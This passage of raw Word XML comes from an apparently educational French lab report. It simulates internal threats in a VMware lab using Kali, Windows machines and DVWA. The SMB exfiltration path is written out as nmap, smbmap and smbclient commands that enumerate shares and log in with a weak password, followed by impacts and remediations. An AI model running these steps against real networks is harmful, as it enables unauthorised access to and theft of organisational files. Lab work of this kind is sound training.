    <w:p w14:paraId="3E885C46" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Une application Web vulnérable (DVWA) déployée sur Kali via Docker pour simuler un service interne ou exposé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1048BFF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L’idée est de reproduire deux types de menaces :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F9856E" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Menace interne ou post-compromission :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C809BDC" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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attaquant présent sur le réseau interne, capable de scanner SMB et exfiltrer des données.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE82B07" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Menace applicative Web :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C778CC" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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attaquant exploitant une application vulnérable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, XSS) pour récupérer des informations sensibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C71E80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3.2 Objectifs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DE2331" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Montrer deux chemins d’attaque bien distincts :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF8C472" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Chemin 1 : SMB → accès non autorisé à des fichiers → exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E954BB7" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Chemin 2 : Web (DVWA) → SQL Injection → accès à des données (utilisateurs, hash) → tentative de craquage → XSS pour illustrer le vol potentiel de cookies/session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60868086" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Documenter :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FD74BD" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Les étapes techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70744B40" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Les preuves (captures, commandes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3877D93A" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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Les impacts sur une organisation réelle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D54D0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3.3 Limites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F8DFE8" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Environnement limité à trois machines principales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB2A35E" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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 de mise en place d’un vrai SIEM, EDR ou SOC, seulement une discussion des outils de détection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F32300E" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Les attaques sont menées sur des services volontairement vulnérables : DVWA et mots de passe faibles, ce qui ne reflète pas toujours les défenses d’une vraie entreprise (mais reflète beaucoup de cas réels mal configurés…).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536A59EF" w14:textId="1ECF69C5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3208FF4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Architecture du mini-laboratoire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E368F14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4.1 Machines utilisées</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1BB9E6" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Kali Linux (ATTACK-Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B778E7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Rôle : attaquant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A639A5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lastRenderedPageBreak/>
        <w:t>Outils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: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smbmap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, docker,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tcpdump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navigateur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Web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FE2F01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Interfaces réseaux :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425E1ED1" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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ens33 en 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(pour SMB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD10F85" w14:textId="4419C336" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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ens37 en NAT (pour Docker / DVWA, accès Internet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024D21C2" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Windows Server (DC / File Server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6414CB0B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Rôle : contrôleur de domaine, éventuellement serveur de fichiers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBE4E5A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OS : Windows Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD085A5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Services : AD DS, SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A3F891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Outils côté Blue Team :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Get-ADUser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Get-ADGroupMember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, journaux d’événements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72837C42" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Windows Client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3942E8E9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Rôle : poste utilisateur vulnérable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EE1313" w14:textId="0F2D0BED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OS : Windows 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065EB758" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Utilisé pour :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAC4C9C" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Se connecter à des partages SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F03EBDE" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1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Naviguer vers DVWA (http://IP_KALI:8081).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147C6C6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4.2 Réseaux VMware et différence SMB vs DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04579392" w14:textId="5F8E3B31" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="00437BBC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>T</w:t>
      </w:r>
      <w:r w:rsidR="008F1386"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opologies différentes, deux plans d’adressage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC50DF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4.2.1 Réseau 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(SMB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B4E8CF" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Type VMware : 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</w:p>
    <w:p w14:paraId="2F543C9E" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Exemple de plage : 192.168.233.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA6570F" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Machines présentes :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0166B63E" w14:textId="7F2D378A" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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Kali : 192.168.233.10 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6A0931" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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Windows Client : 192.168.233.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEF7E22" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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Windows Server/DC : 192.168.233.30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C6C1C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Caractéristiques :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6404F0FE" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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 d’accès Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9E2A3A" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Segment local fermé, simulant un réseau interne.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC6ABDE" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Utilisé pour :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BC3159" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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Scan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48BE0B08" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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Attaque SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBA1ABB" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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Exfiltration de fichiers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A0563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4.2.2 Réseau NAT (DVWA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1782F9" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Type VMware : NAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0856E3" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Exemple de plage : 192.168.116.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFA006E" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Machines :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEF5E1E" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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Kali : 192.168.116.137 (adresse obtenue via DHCP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FA7CCA" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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L’hôte physique fait la passerelle vers Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E922DB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Caractéristiques :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EFD71C" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Accès Internet pour télécharger les images Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241C3819" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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 écoute sur 0.0.0.0:8081 sur Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A0D259" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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 client Windows accède à http://IP_KALI:8081 via le routage assuré par VMware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B2942C" w14:textId="04B89A0E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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> Pourquoi les IP sont différentes ?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  <w:t>Parce que l’attaque SMB et l’attaque DVWA n’utilisent pas le même type de réseau :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EB2EC8" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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 → réseau 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(192.168.233.x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036E7D7C" w14:textId="38FAB45F" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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 → réseau NAT (192.168.116.x)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</w:r>
    </w:p>
    <w:p w14:paraId="40D0B4D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4.3 Schéma global de la topologie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F45B722" w14:textId="2421E5AD" w:rsidR="005721F7" w:rsidRPr="008F1386" w:rsidRDefault="005721F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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4374F058" wp14:editId="6C9D54D4">
            <wp:extent cx="5486400" cy="3872865"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1336398895" name="Image 3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98895" name="Image 3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1046" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Schéma 1 – Vue globale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F812C23" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2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[ATTACK-Kali]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29872B55" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:num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Interface Host-Only → [Réseau 192.168.233.0/24] → [Windows Client] / [Windows Server]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419635F1" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2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Interface NAT → [Réseau 192.168.116.0/24] → [Hôte physique] → [Internet] → téléchargement Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA04521" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2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DVWA tourne dans un conteneur sur Kali, exposé sur :8081.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3188D004" w14:textId="51D6EC84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3235CCCC" w14:textId="6F595E9A" w:rsidR="001543B1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Attaque 1 :</w:t>
      </w:r>
      <w:r w:rsidRPr="008F1386">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"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Exfiltration SMB sur le réseau interne (Host-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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0275B80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5.1 Objectif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7921991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Montrer comment un attaquant présent sur le réseau interne peut :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FA07AF" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Découvrir un service SMB accessible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B057B59" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Identifier un partage vulnérable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C59D6B5" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Se connecter avec un mot de passe faible ou une configuration permissive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8E9B46" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Télécharger des fichiers depuis la machine Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E784C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5.2 Étapes détaillées</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DD908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5.2.1 Vérification de la connectivité</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFF24E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Depuis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Kali :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5338587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ip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addr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show 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ens33</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="33A681D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ping -c 3 192.168.233.20    # IP du client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CF8F7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ping -c 3 192.168.233.30    # IP du serveur/DC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7304D2AB" w14:textId="3B4D7698" w:rsidR="005721F7" w:rsidRDefault="005721F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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25CB89C6" wp14:editId="4175C0BA">
            <wp:extent cx="6394450" cy="4108450"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="1920228557" name="Image 4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28557" name="Image 4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DA2E" w14:textId="24F8ACAB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5.2.2 Scan des ports avec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Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1598D40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sV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-p 445 192.168.233.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2309F42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sV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-p 445 192.168.233.30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE8EC3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Objectif : confirmer que port 445/TCP (SMB) est ouvert et récupérer la version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB8E53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5.2.3 Enumération SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393EA03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-H 192.168.233.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32941B3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-L \\192.168.233.20 -N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E5F023" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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permet de voir les partages disponibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3A6E04" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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liste les partages sur la machine cible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A40BA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5.2.4 Connexion et exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5F8584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Lorsque le compte client avec un mot de passe faible est utilisé :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D920B3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\\192.168.233.20\Partage_client -U client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C53D4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# puis dans l'interface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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CBE59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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4434B3A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fichier_confidentiel.docx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DD75B9" w14:textId="77777777" w:rsid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salary.xlsx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B87A03" w14:textId="5DFD0DB3" w:rsidR="005721F7" w:rsidRPr="008F1386" w:rsidRDefault="005721F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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50036677" wp14:editId="2BB1DDA8">
            <wp:extent cx="5964341" cy="3989705"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="65219513" name="Image 5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513" name="Image 5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431" cy="40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772" w14:textId="77777777" w:rsidR="005721F7" w:rsidRDefault="005721F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483C606C" w14:textId="4B45D951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5.3 Schéma d’attaque SMB </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4BF1F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Chemin d’attaque 1 – SMB / Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8F6030" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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[Kali – attaquant]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</w:r>
      <w:r w:rsidRPr="008F1386">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>⬇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Scan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(port 445)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A69CCC8" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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[Windows Client – SMB exposé]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</w:r>
      <w:r w:rsidRPr="008F1386">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>⬇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Connexion via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avec mot de passe faible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E1E91A" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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[Partage SMB]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</w:r>
      <w:r w:rsidRPr="008F1386">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>⬇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Téléchargement de fichiers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B8591E" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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[Kali] – données exfiltrées stockées localement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7478FA" w14:textId="6F9F7557" w:rsidR="00E20787" w:rsidRDefault="00E2078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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53658590" wp14:editId="6DC55711">
            <wp:extent cx="5486400" cy="4458335"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2040869933" name="Image 6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69933" name="Image 6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8D8F" w14:textId="51AEDD81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5.4 Résultats observés</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E36AC2" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Le service SMB accepte des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credentials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faibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F837D13" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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attaquant interne (ou ayant compromis un poste) peut :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2262319F" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2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Lister des dossiers internes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C167402" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2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Télécharger des documents sans alerte apparente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746D42FF" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Aucun mécanisme de détection ou d’alerte n’est visible dans le labo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB01B6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5.5 Impacts organisationnels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65185ED6" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Fuite de documents internes (confidentiels, RH, finance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FB33D2" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Obligation de notifier en cas de fuite de données (RGPD/Loi 25…).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FFF7B3" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Risque de réputation, perte de confiance des clients/partenaires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCE63F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5.6 Remédiations spécifiques SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DE080C" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Imposer des mots de passe forts et bloquer les mots de passe trop faibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE77DDD" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Réduire les droits des comptes utilisateurs (principe du moindre privilège).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD46865" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Restreindre les partages SMB aux seuls groupes nécessaires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B5ADC2" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Surveiller les logs SMB et corréler via un SIEM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D78E65" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Désactiver SMBv1 et durcir la configuration SMB.</w:t>
      </w:r>
    </w:p>
